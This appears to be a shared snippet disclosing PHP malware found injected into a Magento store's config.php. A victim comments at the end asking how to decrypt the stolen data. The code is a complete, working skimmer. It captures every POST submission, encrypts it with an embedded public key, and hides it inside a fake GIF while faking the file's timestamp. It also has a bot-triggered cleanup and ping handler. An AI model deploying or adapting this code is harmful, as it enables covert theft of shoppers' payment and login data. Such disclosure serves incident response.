The following was added to the magento includes/config.php file
<?PHP | |
$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif'; | |
$m1 = '1355773528'; | |
$k2 = 'pccbe60c'; | |
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----"; | |
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') { | |
if (isset($_GET[$k2])) { | |
$m1 = file_exists($y0) | |
? @filemtime($y0) | |
: $m1; | |
@file_put_contents($y0, ''); | |
@touch($y0, $m1, $m1); | |
echo 'clean ok'; | |
} else { | |
echo 'Pong'; | |
} | |
exit; | |
}if (!empty($_SERVER['HTTP_CLIENT_IP'])) { | |
$i4 = $_SERVER['HTTP_CLIENT_IP']; | |
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { | |
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR']; | |
} else { | |
$i4 = @$_SERVER['REMOTE_ADDR']; | |
}if (isset($_POST) && sizeof($_POST)) { | |
$a5 = ''; | |
foreach ($_POST as $h6 => $n7) { | |
if (is_array($n7)) { | |
foreach ($n7 as $f8 => $l9) { | |
if (is_array($l9)) { | |
foreach ($l9 as $l10 => $v11) { | |
if (is_array($v11)) { | |
; | |
} else { | |
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11; | |
} | |
} | |
} else { | |
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9; | |
} | |
} | |
} else { | |
$a5 .= ':' . $h6 . '=' . $n7; | |
} | |
} | |
$a5 = $i4 . $a5; | |
} else { | |
$a5 = null; | |
}if ($a5) { | |
$t12 = false; | |
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists( | |
'openssl_encrypt' | |
) | |
) { | |
$t12 = true; | |
} elseif (function_exists('dl')) { | |
$n13 = strtolower(substr(php_uname(), 0, 3)); | |
$d14 = 'php_openssl.' . ($n13 == 'win' | |
? 'dll' | |
: 'so'); | |
@dl($d14); | |
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists( | |
'openssl_encrypt' | |
) | |
) { | |
$t12 = true; | |
} | |
} | |
if ($t12) { | |
$t15 = @openssl_get_publickey($k3); | |
$q16 = 128; | |
$t17 = ''; | |
$h18 = md5(md5(microtime()) . rand()); | |
$e19 = $h18; | |
while ($e19) { | |
$f20 = substr($e19, 0, $q16); | |
$e19 = substr($e19, $q16); | |
@openssl_public_encrypt($f20, $h21, $t15); | |
$t17 .= $h21; | |
} | |
$t22 = @openssl_encrypt($a5, 'aes128', $h18); | |
@openssl_free_key($t15); | |
$a5 = $t17 . ':::SEP:::' . $t22; | |
} | |
$m1 = file_exists($y0) | |
? @filemtime($y0) | |
: $m1; | |
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND); | |
@touch($y0, $m1, $m1); | |
}?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Hi, does anyone have his private key, so I could parse the 378Mo pseudo image file to know which postdata have been stolen ??